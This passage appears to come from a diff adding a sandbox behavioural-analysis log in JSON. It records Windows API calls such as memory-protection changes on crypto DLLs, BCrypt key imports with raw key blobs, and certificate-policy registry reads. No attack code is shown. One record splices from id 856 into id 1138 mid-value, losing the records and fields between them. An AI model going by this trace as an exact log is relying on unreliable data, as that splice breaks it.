"ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x746b5000" + }, + { + "name": "ModuleName", + "value": "schannel.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 843 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439c000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 844 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439c000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 845 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x75f2098c", + "parentcaller": "0x75f20a90", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000001c8" + }, + { + "name": "IoControlCode", + "value": "0x00390400" + }, + { + "name": "InputBuffer", + "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x02\\x00\\x01\\x00\\x08Rkt\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x01\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffP\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00c\\x00r\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x90\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x00c\\x00r\\x00y\\x00p\\x00t\\x00s\\x00s\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 846 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x74386358", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\ncryptsslp" + }, + { + "name": "DllBase", + "value": "0x74360000" + } + ], + "repeated": 0, + "id": 847 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x74386358", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\ncryptsslp.dll" + }, + { + "name": "BaseAddress", + "value": "0x74360000" + } + ], + "repeated": 0, + "id": 848 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x74385693", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ncryptsslp.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74360000" + }, + { + "name": "FunctionName", + "value": "GetSChannelInterface" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x743684e0" + } + ], + "repeated": 0, + "id": 849 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x75f2098c", + "parentcaller": "0x75f20a90", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000001c8" + }, + { + "name": "IoControlCode", + "value": "0x00390400" + }, + { + "name": "InputBuffer", + "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00L\\xd3\\x03w0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00S\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\xf5G8t" + }, + { + "name": "OutputBuffer", + "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x001\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffS\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 850 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x75f21256", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "bcryptPrimitives.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76090000" + }, + { + "name": "FunctionName", + "value": "GetHashInterface" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x760a5880" + } + ], + "repeated": 3, + "id": 851 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x75f2098c", + "parentcaller": "0x75f20a90", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000001c8" + }, + { + "name": "IoControlCode", + "value": "0x00390400" + }, + { + "name": "InputBuffer", + "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x87Net0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00A\\x00E\\x00S\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00S\\x00\\x00\\x00\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffA\\x00E\\x00S\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x00e\\x00y\\x00L\\x00e\\x00n\\x00g\\x00t\\x00h\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00" + } + ], + "repeated": 0, + "id": 852 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x75f21256", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "bcryptPrimitives.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76090000" + }, + { + "name": "FunctionName", + "value": "GetCipherInterface" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x760ba8d0" + } + ], + "repeated": 0, + "id": 853 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00543000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 854 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74365d74", + "parentcaller": "0x74384013", + "category": "crypto", + "api": "BCryptImportKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00 \\x00\\x00\\x00\\xafL\\xd7\\xaf\\xd8 \\xd4\\xd9\\x8c\\x83\\xda\\xceH\\xf1\\x1a\\x1f~G\\x8c\\x81\\x07\\xe4\\xd3\\xb9\\xfay\\\\x80\\xda>\\xa5\\xca\\x00\\x00\\x00\\x00\\xafL\\xd7\\xaf\\xd8 \\xd4\\xd9\\x8c\\x83\\xda\\xceH\\xf1\\x1a\\x1f~G\\x8c\\x81\\x07\\xe4\\xd3\\xb9\\xfay\\\\x80\\xda>\\xa5\\xca\\x1cJ\\xa3\\xf8\\xc4jw!H\\xe9\\xad\\xef\\x00\\x18\\xb7\\xf0\\x1d\\xea%\r\\x1a\\x0e\\xf6\\xb4\\xe0w\\xaa4:I\\x0f\\xfe%<\\x18x\\xe1VoY\\xa9\\xbf\\xc2\\xb6\\xa9\\xa7uF\\xce\\xb6\\xb8W\\xd4\\xb8N\\xe34\\xcf\\xe4\\xd7\\x0e\\x86\\xeb)e\\xd5\\xbd\\xd3\\x84\\x83\\xd2\\x8a-<\\x10<\\x84\\x9bez\\x91\\xa2\\xf5\\x8dE\\x1a\\xbbnq\\xd5_\\xb9\\x7fS\\xb4\\x90\\x80X\\xdd\\x01\\x04\\xdb\\x0f\\x8b)\\xe7\\x1f\\xb7\\xad|z\\xcd\\x04\\xb2/0A\\xa8\\x94^0}\\xcb\\xe7O.\\x7fw\\xa1\\x8a(\\x85\\xa5Q'\\x0e\\x8c\\xb68\\xb9!\\xcaBt\\xf9\\xc6\\x03\\xa2\\xb8n\\x97\\xfc\\x88\\x13\\\\x1b\\xc7=#l" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x00542d10" + }, + { + "name": "Length", + "value": "560" + } + ], + "repeated": 0, + "id": 855 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00544000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 856 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74365d74", + "parentcaller": "0x74384013", + "category": "crypto", + "api": "BCryptImportKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00 \\x00\\x00\\x00\\x9a\\xc0\\xaex\\x19a\\xe9\\x8f\\xf7^\\xafry\\xe1\\xb3\\xa4\\xdc\\xc4\\x85lz\\xd5\\xb8\\xee\\x95\\x1d\\xa8\\xdbm\\x15 N\\x00\\x00\\x00\\x00\\x9a\\xc0\\xaex\\x19a\\xe9\\x8f\\xf7^\\xafry\\xe1\\xb3\\xa4\\xdc\\xc4\\x85lz\\xd5\\xb8\\xee\\x95\\x1d\\xa8\\xdbm\\x15 N\\xc2w\\x81D\\xdb\\x16h\\xcb,H\\xc7\\xb9U\\xa9t\\x1d \\x17\\x17\\xc8Z\\xc2\\xaf&\\xcf\\xdf\\x07\\xfd\\xa2\\xca'\\xb3\\xb4\\xbb\\xec~o\\xad\\x84\\xb5C\\xe5C\\x0c\\x16L7\\x11g>\\x8dJ=\\xfc\"l\\xf2#%\\x91P\\xe9\\x02\"\\xae\\xcc\\x7f-\\xc1a\\xfb\\x98\\x82\\x84\\xb8\\x94\\x94\\xc8\\x8f\\x85E\\xd6\\xfe\\xddx*\\xdc\\xb1\\x8a\t\\xf9 \\xda\\xe0\\xfb\\x02G\\xc3\\x08z\\x86\\xa2\\xf3\\xe2\\x04&Kv\\x90\\xee\\xc4\\xf3%\\xfe\\xe2\\xd0]\\xd4>a\\xd7\\xdd\\xc7A\r=\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v+\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00l\\xee[\\x05x\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xe8\\xee[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's8\\xef[\\x05\\x9b>\\xd6\\xfa\\x1c\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff4\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%st\\xef[\\x05\\xdc\\xf1\\x94\\xef4\\xef$\\xef\\x98\\xef\\x00\\x00<\\xff\\x00\\x00\\xdc\\xf1[\\x05\\x94\\xef[\\x05\\x98\\xef[\\x05\\x00\\x00\\x00\\x00H\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00t\\xef[\\x05" + } + ], + "repeated": 0, + "id": 1138 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1139 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1140 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1141 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000514" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\" + } + ], + "repeated": 0, + "id": 1142 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1143 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000514" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1144 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1145 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1146 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1147 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1148 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1149 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1150 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1151 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1152 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1153 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1154 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00558000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1155 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1156 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": 